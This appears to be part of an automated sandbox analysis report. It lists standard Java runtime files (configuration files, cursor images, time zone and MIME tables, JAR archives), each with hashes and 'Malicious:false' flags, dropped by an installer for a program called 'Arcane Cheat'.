                                Preview:# Copyright (c) 2001, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..# List of JVMs that can be used as an option to java, javac, etc...# Order is important -- first in this list is the default JVM...# NOTE that this both this file and its format are UNSUPPORTED and..# WILL GO AWAY in a future release...#..# You may also select a JVM in an arbitrary location with the..# "-XXaltjvm=<jvm_dir>" option, but that too is unsupported..# and may not be available in a future release...#..-client KNOWN..-server KNOWN..

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\images\cursors\cursors.properties (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):5.02145006262851
                                Encrypted:false
                                SSDEEP:24:n3lG0Bf4dJ0qEAmG620WKG0WBph8T2AGjGg0kz8lrbfOi7:3E0Bf4qrzrlWzy+ckUfP
                                MD5:01B94C63BD5E6D094E84FF3AD640FFBF
                                SHA1:5570F355456250B1EC902375B0257584DB2360AE
                                SHA-256:52845DEB58038B4375C30B75DD2053726872758C96597C7CC5D6CEF11F42A2BA
                                SHA-512:816BE2271CF3ECF10EE40E24A288CE302B2810010BEF76EFC0CE5746591955921B70F19005335F485D61A7B216DCCE0B06750831720DD426D07709154D5FAC7A
                                Malicious:false
                                Preview:#..#..# Cursors Properties file..#..# Names GIF89 sources for Custom Cursors and their associated HotSpots..#..# Note: the syntax of the property name is significant and is parsed..# by java.awt.Cursor..#..# The syntax is: Cursor.<name>.<geom>.File=win32_<filename>..# Cursor.<name>.<geom>.HotSpot=<x>,<y>..#. Cursor.<name>.<geom>.Name=<localized name>..#..Cursor.CopyDrop.32x32.File=win32_CopyDrop32x32.gif..Cursor.CopyDrop.32x32.HotSpot=0,0..Cursor.CopyDrop.32x32.Name=CopyDrop32x32..#..Cursor.MoveDrop.32x32.File=win32_MoveDrop32x32.gif..Cursor.MoveDrop.32x32.HotSpot=0,0..Cursor.MoveDrop.32x32.Name=MoveDrop32x32..#..Cursor.LinkDrop.32x32.File=win32_LinkDrop32x32.gif..Cursor.LinkDrop.32x32.HotSpot=0,0..Cursor.LinkDrop.32x32.Name=LinkDrop32x32..#..Cursor.CopyNoDrop.32x32.File=win32_CopyNoDrop32x32.gif..Cursor.CopyNoDrop.32x32.HotSpot=6,2..Cursor.CopyNoDrop.32x32.Name=CopyNoDrop32x32..#..Cursor.MoveNoDrop.32x32.File=win32_MoveNoDrop32x32.gif..Cursor.MoveNoDrop.32x32.Ho

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\images\cursors\invalid32x32.gif (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 32 x 32
                                Category:dropped
                                Size (bytes):153
                                Entropy (8bit):6.2813106319833665
                                Encrypted:false
                                SSDEEP:3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
                                MD5:1E9D8F133A442DA6B0C74D49BC84A341
                                SHA1:259EDC45B4569427E8319895A444F4295D54348F
                                SHA-256:1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
                                SHA-512:63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
                                Malicious:false
                                Preview:GIF89a . ................!.......,.... . ...j.?...o..T....._]-..9.`..D...f........^...n.`.%C......<..E..S&QL.....n+...R....'|N...."U........(8HXhx.X..;

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\images\cursors\is-C85MI.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 31 x 32
                                Category:dropped
                                Size (bytes):147
                                Entropy (8bit):6.147949937659802
                                Encrypted:false
                                SSDEEP:3:CruuU/XExlHrSauZKwM7Qt/wCvTjh2Azr8ptBNKtWXOh6WoXt2W:KP0UvEKwMcx3UAzADBNXOh6h9p
                                MD5:CC8DD9AB7DDF6EFA2F3B8BCFA31115C0
                                SHA1:1333F489AC0506D7DC98656A515FEEB6E87E27F9
                                SHA-256:12CFCE05229DBA939CE13375D65CA7D303CE87851AE15539C02F11D1DC824338
                                SHA-512:9857B329ACD0DB45EA8C16E945B4CFA6DF9445A1EF457E4B8B40740720E8C658301FC3AB8BDD242B7697A65AE1436FD444F1968BD29DA6A89725CDDE1DE387B8
                                Malicious:false
                                Preview:GIF89a.. ................!.......,...... ...dL...-....F....o.U.8J..'J.....3...a...."...")..=fPHS......h.Zc.KDj.....-.kj..m.....X,&.......S..;

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\images\cursors\is-FK0R7.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 31 x 32
                                Category:dropped
                                Size (bytes):165
                                Entropy (8bit):6.347455736310776
                                Encrypted:false
                                SSDEEP:3:CruuU/XExlHrBwM7Qt/wCvTjh2Azr8ptBNKtWwUzJ7Ful5u44JyYChWn:KP0URwMcx3UAzADBNwUlBul5TLYMWn
                                MD5:89CDF623E11AAF0407328FD3ADA32C07
                                SHA1:AE813939F9A52E7B59927F531CE8757636FF8082
                                SHA-256:13C783ACD580DF27207DABCCB10B3F0C14674560A23943AC7233DF7F72D4E49D
                                SHA-512:2A35311D7DB5466697D7284DE75BABEE9BD0F0E2B20543332FCB6813F06DEBF2457A9C0CF569449C37F371BFEB0D81FB0D219E82B9A77ACC6BAFA07499EAC2F7
                                Malicious:false
                                Preview:GIF89a.. ................!.......,...... ...vL...-....F....o.U.8J..'J.....3...a...."...")..=fPHS......h.Zc.KDj........k.-mF.. V..9'......f.T....w.xW.B.....P..;

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\images\cursors\is-HGFT2.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 32 x 32
                                Category:dropped
                                Size (bytes):153
                                Entropy (8bit):6.2813106319833665
                                Encrypted:false
                                SSDEEP:3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
                                MD5:1E9D8F133A442DA6B0C74D49BC84A341
                                SHA1:259EDC45B4569427E8319895A444F4295D54348F
                                SHA-256:1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
                                SHA-512:63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
                                Malicious:false
                                Preview:GIF89a . ................!.......,.... . ...j.?...o..T....._]-..9.`..D...f........^...n.`.%C......<..E..S&QL.....n+...R....'|N...."U........(8HXhx.X..;

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\images\cursors\is-I6PSN.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 32 x 32
                                Category:dropped
                                Size (bytes):153
                                Entropy (8bit):6.2813106319833665
                                Encrypted:false
                                SSDEEP:3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
                                MD5:1E9D8F133A442DA6B0C74D49BC84A341
                                SHA1:259EDC45B4569427E8319895A444F4295D54348F
                                SHA-256:1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
                                SHA-512:63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
                                Malicious:false
                                Preview:GIF89a . ................!.......,.... . ...j.?...o..T....._]-..9.`..D...f........^...n.`.%C......<..E..S&QL.....n+...R....'|N...."U........(8HXhx.X..;

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\images\cursors\is-KJBAP.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 32 x 32
                                Category:dropped
                                Size (bytes):153
                                Entropy (8bit):6.2813106319833665
                                Encrypted:false
                                SSDEEP:3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
                                MD5:1E9D8F133A442DA6B0C74D49BC84A341
                                SHA1:259EDC45B4569427E8319895A444F4295D54348F
                                SHA-256:1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
                                SHA-512:63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
                                Malicious:false
                                Preview:GIF89a . ................!.......,.... . ...j.?...o..T....._]-..9.`..D...f........^...n.`.%C......<..E..S&QL.....n+...R....'|N...."U........(8HXhx.X..;

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\images\cursors\is-Q1QMN.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):5.02145006262851
                                Encrypted:false
                                SSDEEP:24:n3lG0Bf4dJ0qEAmG620WKG0WBph8T2AGjGg0kz8lrbfOi7:3E0Bf4qrzrlWzy+ckUfP
                                MD5:01B94C63BD5E6D094E84FF3AD640FFBF
                                SHA1:5570F355456250B1EC902375B0257584DB2360AE
                                SHA-256:52845DEB58038B4375C30B75DD2053726872758C96597C7CC5D6CEF11F42A2BA
                                SHA-512:816BE2271CF3ECF10EE40E24A288CE302B2810010BEF76EFC0CE5746591955921B70F19005335F485D61A7B216DCCE0B06750831720DD426D07709154D5FAC7A
                                Malicious:false
                                Preview:#..#..# Cursors Properties file..#..# Names GIF89 sources for Custom Cursors and their associated HotSpots..#..# Note: the syntax of the property name is significant and is parsed..# by java.awt.Cursor..#..# The syntax is: Cursor.<name>.<geom>.File=win32_<filename>..# Cursor.<name>.<geom>.HotSpot=<x>,<y>..#. Cursor.<name>.<geom>.Name=<localized name>..#..Cursor.CopyDrop.32x32.File=win32_CopyDrop32x32.gif..Cursor.CopyDrop.32x32.HotSpot=0,0..Cursor.CopyDrop.32x32.Name=CopyDrop32x32..#..Cursor.MoveDrop.32x32.File=win32_MoveDrop32x32.gif..Cursor.MoveDrop.32x32.HotSpot=0,0..Cursor.MoveDrop.32x32.Name=MoveDrop32x32..#..Cursor.LinkDrop.32x32.File=win32_LinkDrop32x32.gif..Cursor.LinkDrop.32x32.HotSpot=0,0..Cursor.LinkDrop.32x32.Name=LinkDrop32x32..#..Cursor.CopyNoDrop.32x32.File=win32_CopyNoDrop32x32.gif..Cursor.CopyNoDrop.32x32.HotSpot=6,2..Cursor.CopyNoDrop.32x32.Name=CopyNoDrop32x32..#..Cursor.MoveNoDrop.32x32.File=win32_MoveNoDrop32x32.gif..Cursor.MoveNoDrop.32x32.Ho

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\images\cursors\is-Q5E2F.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 31 x 32
                                Category:dropped
                                Size (bytes):168
                                Entropy (8bit):6.465243369905675
                                Encrypted:false
                                SSDEEP:3:CruuU/XExlHrZauowM7Qt/wCvTjh2Azr8ptBNKtWwUzJZmQYRNbC1MIQvEn:KP0UpawMcx3UAzADBNwUlZaCzn
                                MD5:694A59EFDE0648F49FA448A46C4D8948
                                SHA1:4B3843CBD4F112A90D112A37957684C843D68E83
                                SHA-256:485CBE5C5144CFCD13CC6D701CDAB96E4A6F8660CBC70A0A58F1B7916BE64198
                                SHA-512:CF2DFD500AF64B63CC080151BC5B9DE59EDB99F0E31676056CF1AFBC9D6E2E5AF18DC40E393E043BBBBCB26F42D425AF71CCE6D283E838E67E61D826ED6ECD27
                                Malicious:false
                                Preview:GIF89a.. ................!.......,...... ...yL...-....F....o.U.8J..'J.....3...a...."...")..=fPHS......h.Zc.KDj........k.-mF.6.'.....`1]......u.Q.r.V..C......f.P..;

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\images\cursors\is-T6K13.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 32 x 32
                                Category:dropped
                                Size (bytes):153
                                Entropy (8bit):6.2813106319833665
                                Encrypted:false
                                SSDEEP:3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
                                MD5:1E9D8F133A442DA6B0C74D49BC84A341
                                SHA1:259EDC45B4569427E8319895A444F4295D54348F
                                SHA-256:1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
                                SHA-512:63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
                                Malicious:false
                                Preview:GIF89a . ................!.......,.... . ...j.?...o..T....._]-..9.`..D...f........^...n.`.%C......<..E..S&QL.....n+...R....'|N...."U........(8HXhx.X..;

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\images\cursors\win32_CopyDrop32x32.gif (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 31 x 32
                                Category:dropped
                                Size (bytes):165
                                Entropy (8bit):6.347455736310776
                                Encrypted:false
                                SSDEEP:3:CruuU/XExlHrBwM7Qt/wCvTjh2Azr8ptBNKtWwUzJ7Ful5u44JyYChWn:KP0URwMcx3UAzADBNwUlBul5TLYMWn
                                MD5:89CDF623E11AAF0407328FD3ADA32C07
                                SHA1:AE813939F9A52E7B59927F531CE8757636FF8082
                                SHA-256:13C783ACD580DF27207DABCCB10B3F0C14674560A23943AC7233DF7F72D4E49D
                                SHA-512:2A35311D7DB5466697D7284DE75BABEE9BD0F0E2B20543332FCB6813F06DEBF2457A9C0CF569449C37F371BFEB0D81FB0D219E82B9A77ACC6BAFA07499EAC2F7
                                Malicious:false
                                Preview:GIF89a.. ................!.......,...... ...vL...-....F....o.U.8J..'J.....3...a...."...")..=fPHS......h.Zc.KDj........k.-mF.. V..9'......f.T....w.xW.B.....P..;

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\images\cursors\win32_CopyNoDrop32x32.gif (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 32 x 32
                                Category:dropped
                                Size (bytes):153
                                Entropy (8bit):6.2813106319833665
                                Encrypted:false
                                SSDEEP:3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
                                MD5:1E9D8F133A442DA6B0C74D49BC84A341
                                SHA1:259EDC45B4569427E8319895A444F4295D54348F
                                SHA-256:1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
                                SHA-512:63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
                                Malicious:false
                                Preview:GIF89a . ................!.......,.... . ...j.?...o..T....._]-..9.`..D...f........^...n.`.%C......<..E..S&QL.....n+...R....'|N...."U........(8HXhx.X..;

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\images\cursors\win32_LinkDrop32x32.gif (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 31 x 32
                                Category:dropped
                                Size (bytes):168
                                Entropy (8bit):6.465243369905675
                                Encrypted:false
                                SSDEEP:3:CruuU/XExlHrZauowM7Qt/wCvTjh2Azr8ptBNKtWwUzJZmQYRNbC1MIQvEn:KP0UpawMcx3UAzADBNwUlZaCzn
                                MD5:694A59EFDE0648F49FA448A46C4D8948
                                SHA1:4B3843CBD4F112A90D112A37957684C843D68E83
                                SHA-256:485CBE5C5144CFCD13CC6D701CDAB96E4A6F8660CBC70A0A58F1B7916BE64198
                                SHA-512:CF2DFD500AF64B63CC080151BC5B9DE59EDB99F0E31676056CF1AFBC9D6E2E5AF18DC40E393E043BBBBCB26F42D425AF71CCE6D283E838E67E61D826ED6ECD27
                                Malicious:false
                                Preview:GIF89a.. ................!.......,...... ...yL...-....F....o.U.8J..'J.....3...a...."...")..=fPHS......h.Zc.KDj........k.-mF.6.'.....`1]......u.Q.r.V..C......f.P..;

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 32 x 32
                                Category:dropped
                                Size (bytes):153
                                Entropy (8bit):6.2813106319833665
                                Encrypted:false
                                SSDEEP:3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
                                MD5:1E9D8F133A442DA6B0C74D49BC84A341
                                SHA1:259EDC45B4569427E8319895A444F4295D54348F
                                SHA-256:1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
                                SHA-512:63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
                                Malicious:false
                                Preview:GIF89a . ................!.......,.... . ...j.?...o..T....._]-..9.`..D...f........^...n.`.%C......<..E..S&QL.....n+...R....'|N...."U........(8HXhx.X..;

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\images\cursors\win32_MoveDrop32x32.gif (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 31 x 32
                                Category:dropped
                                Size (bytes):147
                                Entropy (8bit):6.147949937659802
                                Encrypted:false
                                SSDEEP:3:CruuU/XExlHrSauZKwM7Qt/wCvTjh2Azr8ptBNKtWXOh6WoXt2W:KP0UvEKwMcx3UAzADBNXOh6h9p
                                MD5:CC8DD9AB7DDF6EFA2F3B8BCFA31115C0
                                SHA1:1333F489AC0506D7DC98656A515FEEB6E87E27F9
                                SHA-256:12CFCE05229DBA939CE13375D65CA7D303CE87851AE15539C02F11D1DC824338
                                SHA-512:9857B329ACD0DB45EA8C16E945B4CFA6DF9445A1EF457E4B8B40740720E8C658301FC3AB8BDD242B7697A65AE1436FD444F1968BD29DA6A89725CDDE1DE387B8
                                Malicious:false
                                Preview:GIF89a.. ................!.......,...... ...dL...-....F....o.U.8J..'J.....3...a...."...")..=fPHS......h.Zc.KDj.....-.kj..m.....X,&.......S..;

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\images\cursors\win32_MoveNoDrop32x32.gif (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:GIF image data, version 89a, 32 x 32
                                Category:dropped
                                Size (bytes):153
                                Entropy (8bit):6.2813106319833665
                                Encrypted:false
                                SSDEEP:3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
                                MD5:1E9D8F133A442DA6B0C74D49BC84A341
                                SHA1:259EDC45B4569427E8319895A444F4295D54348F
                                SHA-256:1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
                                SHA-512:63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
                                Malicious:false
                                Preview:GIF89a . ................!.......,.... . ...j.?...o..T....._]-..9.`..D...f........^...n.`.%C......<..E..S&QL.....n+...R....'|N...."U........(8HXhx.X..;

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\is-4AM1E.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8602
                                Entropy (8bit):5.204166069367786
                                Encrypted:false
                                SSDEEP:192:j1kfcymkDvxeMmKg5GQEK2TtllXinSV29OHPQT:hhymk/QGT7YT
                                MD5:B8DD8953B143685B5E91ABEB13FF24F0
                                SHA1:B5CEB39061FCE39BB9D7A0176049A6E2600C419C
                                SHA-256:3D49B3F2761C70F15057DA48ABE35A59B43D91FA4922BE137C0022851B1CA272
                                SHA-512:C9CD0EB1BA203C170F8196CBAB1AAA067BCC86F2E52D0BAF979AAD370EDF9F773E19F430777A5A1C66EFE1EC3046F9BC82165ACCE3E3D1B8AE5879BD92F09C90
                                Malicious:false
                                Preview:#..# This file describes mapping information between Windows and Java..# time zones...# Format: Each line should include a colon separated fields of Windows..# time zone registry key, time zone mapID, locale (which is most..# likely used in the time zone), and Java time zone ID. Blank lines..# and lines that start with '#' are ignored. Data lines must be sorted..# by mapID (ASCII order)...#..# NOTE..# This table format is not a public interface of any Java..# platforms. No applications should depend on this file in any form...#..# This table has been generated by a program and should not be edited..# manually...#..Romance:-1,64::Europe/Paris:..Romance Standard Time:-1,64::Europe/Paris:..Warsaw:-1,65::Europe/Warsaw:..Central Europe:-1,66::Europe/Prague:..Central Europe Standard Time:-1,66::Europe/Prague:..Prague Bratislava:-1,66::Europe/Prague:..W. Central Africa Standard Time:-1,66:AO:Africa/Luanda:..FLE:-1,67:FI:Europe/Helsinki:..FLE Standard Time:-1,67:FI:E

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\is-4CLUR.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):5824
                                Entropy (8bit):5.074440246603207
                                Encrypted:false
                                SSDEEP:96:6M5VfH+uEMmPDkZeujdJfZUB8BB/+PhPXsOQ71GAXf5lZuU1EbWF7Ycx/AQ12a8T:6M6p4ZeWd1ZUB8BBGPhPXsOQ71GAXBly
                                MD5:95AE170D90764B3F5E68C72E8C518DDC
                                SHA1:1939B699D16A5DB3E3F905466222099D7C29285A
                                SHA-256:A2B31E9CBCEAB296A5E1CF056EFD953CED23B888CD929B0BBE6EB6B53D2BF861
                                SHA-512:87E970BEAC8141C757D622FC8B6D84FE173EA4B134AFD8E2F979714C1110C3D92F3CE5F2B9DC74804DD37D13AB2A0EDF0FCA242F61CF8ED065AE81B7331F8816
                                Malicious:false
                                Preview:#sun.net.www MIME content-types table..#..# Property fields:..#..# <description> ::= 'description' '=' <descriptive string>..# <extensions> ::= 'file_extensions' '=' <comma-delimited list, include '.'>..# <image> ::= 'icon' '=' <filename of icon image>..# <action> ::= 'browser' | 'application' | 'save' | 'unknown'..# <application> ::= 'application' '=' <command line template>..#....#..# The "we don't know anything about this data" type(s)...# Used internally to mark unrecognized types...#..content/unknown: description=Unknown Content..unknown/unknown: description=Unknown Data Type....#..# The template we should use for temporary files when launching an application..# to view a document of given type...#..temp.file.template: c:\\temp\\%s....#..# The "real" types...#..application/octet-stream: \...description=Generic Binary Stream;\...file_extensions=.saveme,.dump,.hqx,.arc,.obj,.lib,.bin,.exe,.zip,.gz....application/oda: \...description=ODA Document;\...file_extens

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\is-4SN73.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):2126
                                Entropy (8bit):4.970874214349507
                                Encrypted:false
                                SSDEEP:48:EE796OfeCiuG2M5tP5iMmC5KOAY2HQii+r4IzteKk:EnEiuGJbP5lmC5KOA3HQii+EIz8Kk
                                MD5:91AA6EA7320140F30379F758D626E59D
                                SHA1:3BE2FEBE28723B1033CCDAA110EAF59BBD6D1F96
                                SHA-256:4AF21954CDF398D1EAE795B6886CA2581DAC9F2F1D41C98C6ED9B5DBC3E3C1D4
                                SHA-512:03428803F1D644D89EB4C0DCBDEA93ACAAC366D35FC1356CCABF83473F4FEF7924EDB771E44C721103CEC22D94A179F092D1BFD1C0A62130F076EB82A826D7CB
                                Malicious:false
                                Preview:% VERSION 2..% WARNING: this file is auto-generated; do not edit..% UNSUPPORTED: this file and its format may change and/or..% may be removed in a future release..# charsets.jar..sun/nio..sun/awt..# jce.jar..javax/crypto..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# jfr.jar..oracle/jrockit/..jdk/jfr..com/oracle/jrockit/..! jsse.jar..sun/security..com/sun/net/..! management-agent.jar..@ resources.jar..com/sun/java/util/jar/pack/..META-INF/services/sun.util.spi.XmlPropertiesProvider..META-INF/services/javax.print.PrintServiceLookup..com/sun/corba/..META-INF/services/javax.sound.midi.spi.SoundbankReader..sun/print..META-INF/services/javax.sound.midi.spi.MidiFileReader..META-INF/services/sun.java2d.cmm.CMMServiceProvider..javax/swing..META-INF/services/javax.sound.sampled.spi.AudioFileReader..META-INF/services/javax.sound.midi.spi.MidiDeviceProvider..sun/net..META-INF/services/javax.sound.sampled.spi.AudioFileWriter..com/sun/imageio/..META-INF/services/sun.java2d.pipe.Ren

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\is-5EIE5.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):63602929
                                Entropy (8bit):5.963369315504544
                                Encrypted:false
                                SSDEEP:786432:WyfysbZyGp7g85KKwcl0HeJgyll3LTjjA:F0GZTjjA
                                MD5:EDB5B5B3EF4565E4E86BFFE647FB1AA2
                                SHA1:11F5B1B2D729309059B1BD1FE2922251D9451D5F
                                SHA-256:D00351BD39DE7DBF9E9FDBB9EE1FD82189189F9BC82E988B58E1E950D1D4BDC8
                                SHA-512:05E7F9ED915610B70664EB7CB68F3F0BBA5BD5CF208BBDB54007DA5FF6311A6DDBBF057E0DF5A346C9042333C29E5C766B2C0A686628F8655C2E75061A9179C1
                                Malicious:false
                                Preview:PK...........H................META-INF/....PK...........H.5.%...%.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_101..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_07 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....Name: javax/swing/JCheckBoxMenuItem.class..Java-Bean: True....Name: javax/swing/JDialog.class..Java-Bean: True....Name: javax/swing/JSlider.class..Java-Bean: True....Name: javax/swing/JTextField.class..Java-Bean: True....Name: javax/swing/JTextPane.class..Java-Bean: True....Name: javax/swing/JTextArea.class..Java-Bean: True....Name: javax/swing/JList.class..Java-Bean: True....Name: javax/swing/JFormattedTextField.class..Java-Bean: True....Name: javax/swing/JApplet.class..Java-Bean: True....Name: javax/swing/JSpinner.class..Java-Bean: True....Name: javax/swing/JLabel.class..Java-Bean

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\is-62RAF.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):633957
                                Entropy (8bit):6.018176262975427
                                Encrypted:false
                                SSDEEP:6144:ABoQeW0HKwYGORU+ehqEmke1WEAibVR0GPs4j8GgflXhuuMAjYDTj:Uo40WGdNmpb3DP75
                                MD5:FD1434C81219C385F30B07E33CEF9F30
                                SHA1:0B5EE897864C8605EF69F66DFE1E15729CFCBC59
                                SHA-256:BC3A736E08E68ACE28C68B0621DCCFB76C1063BD28D7BD8FCE7B20E7B7526CC5
                                SHA-512:9A778A3843744F1FABAD960AA22880D37C30B1CAB29E123170D853C9469DC54A81E81A9070E1DE1BF63BA527C332BB2B1F1D872907F3BDCE33A6898A02FEF22D
                                Malicious:false
